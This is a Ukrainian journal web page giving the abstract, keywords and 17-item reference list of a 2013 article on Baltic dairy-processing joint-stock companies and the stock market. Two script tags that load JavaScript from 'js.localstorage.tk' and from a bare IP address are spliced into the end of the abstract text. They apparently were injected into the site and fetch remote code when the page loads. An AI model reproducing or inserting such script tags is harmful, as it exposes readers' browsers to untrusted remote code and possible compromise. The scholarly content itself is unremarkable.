ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 336:338.432:637.134
Сторінка молодого науковця

Зарубіжний досвід у сфері діяльності молокопереробних акціонерних компаній на фондовому ринку / Шваб О. В. // Економіка АПК. - 2013. - № 7 - С. 126

Розглянуто досвід країн Балтії у сфері діяльності молокопереробних акціонерних товариств на фондовому ринку, досліджено особливості його становлення у цих країнах. Проаналізовано фінансові показники діяльності провідних молокопереробних компаній Європи. Визначено, що поліпшення якості молока було спільним і вирішальним стимулом у розвитку молокопродуктової галузі балтійських країн. Встановлено, що вагому роль відіграла підтримка виробників сировини з боку держави (пільгові кредити, протекціоністські заходи), переробних підприємств (матеріальні стимули за сировину кращої якості) та іноземних інвесторів (запровадження тестів якості, висунення нових високих вимог для кінцевого продукту молокопереробки). Визначено пріоритетні напрями розвитку вітчизняних молокопереробних акціонерних компаній. Табл.: 3. Рис.: 1. Бібліогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: молокопереробна галузь, акціонерні товариства, інвестиції, фондовий ринок, акції, фінансові ресурси

Список використаних джерел

 1. Баффетт У. Эссе об инвестициях, корпоративных финансах и управлении компаниями / Уоррен Баффетт; [сост., авт. предисл. Лоренс Каннингем ; пер. с англ.]. — М. : Альпина Бизнес Букс, 2005. — 268 с.
 2. Гохан П.А. Слияния, поглощения и реструктуризация компаний / П.А. Гохан ; пер. с англ. – М.: Альпина Бизнес Букс, 2004. – 742 с.
 3. Захист прав інвесторів // [Електронний ресурс]. – Режим доступу: http://nssmc.gov.ua/fund/investorsrights
 4. Бочаров В.В. Корпоративные финансы / В.В. Бочаров, В.Е. Леонтьев. – СПб.: Питер, 2004. – 562 с.
 5. Кузьмін О.Є. Венчурний бізнес : навч. посіб. / О.Є. Кузьмін, І.В. Литвин. – К., 2012. — 350 с.
 6. Офіц. сайт Міністерства сільського господарства Естонії // [Електронний ресурс]. – Режим доступу: http://www.agri.ee/.
 7. Постанова Верховного Суду України від 24.10.2008 № 13 «Про практику розгляду судами корпоративних спорів» // [Електронний ресурс]. – Режим доступу: http://zakon2.rada.gov.ua/laws/show/v0013700-08.
 8. Терещенко О.О. Фінансова діяльність суб’єктів господарювання : навч. посіб. / О.О. Терещенко. — К.: КНЕУ, 2003. —554 с.
 9. David G. Luenberger. Investment Science / G. David. – New York: Oxford University Press, 1997.
 10. Essentials of Investments / Alex Kane, Zvi Bodie. Boston University, University of California, San Diego. 5th edition, 2004.
 11. Eurostat [Електронний ресурс]. – Режим доступу: http://epp.eurostat.ec.europa.eu/portal/page/portal/eurostat/home/.
 12. Kein A. Estonian Institutional Harmonisation and Socio-Economic Convergence with the EU: the Aspects of Development, Credibility and Consistency of Estonian Capital Markets / А. Kein. – Tallinn: Institute of Economics, Estonian Academy of Sciences & International Center for Economic Growth, 1995.
 13. Liesbeth Dries. Vertical Coordination and Foreign Direct Investment : A comparative study of the dairy chains in Bulgaria, Poland, and Slovakia [Електронний ресурс] / Liesbeth Dries. – Режим доступу: eastagri.org/meetings/docs…Final…Dairy…chains.doc.
 14. NASDAQ OMX Baltic [Електронний ресурс]. – Режим доступу: http://www.nasdaqomxbaltic.com.
 15. OECD-FAO Agricultural Outlook 2011 [Електронний ресурс]. – Режим доступу: http://dx.doi.org/10.1787/888932427303.
 16. Tetra Pak forecasts continued growth in global milk consumption over the next three years [Електронний ресурс]. – Режим доступу: http://www.tetrapak.com/about_tetra_pak/press_room/news/Pages/tetra_pak_forecasts_continued_growth.aspx.
 17. The Global Competitiveness Report 2011-2012 [Електронний ресурс]. – Режим доступу: http://ru.scribd.com/doc/64062288/The-Global-Competitiveness-Report-2011-2012.
Читати статтю: 13_07_126-133.pdf